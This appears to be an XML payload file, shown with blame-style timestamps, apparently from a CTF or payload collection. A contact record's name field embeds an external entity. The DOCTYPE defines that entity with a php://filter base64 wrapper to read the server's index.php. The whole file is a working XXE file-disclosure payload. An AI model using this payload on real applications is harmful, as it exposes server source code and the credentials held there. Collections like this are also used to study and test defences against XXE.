2017-08-07 21:42:14 +02:00
|
|
|
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
|
|
|
|
|
<contacts>
|
|
|
|
|
<contact>
|
|
|
|
|
<name>Jean &xxe; Dupont</name>
|
|
|
|
|
<phone>00 11 22 33 44</phone>
|
2020-10-17 22:47:20 +02:00
|
|
|
<address>42 rue du CTF</address>
|
2017-08-07 21:42:14 +02:00
|
|
|
<zipcode>75000</zipcode>
|
|
|
|
|
<city>Paris</city>
|
|
|
|
|
</contact>
|
|
|
|
|
</contacts>
|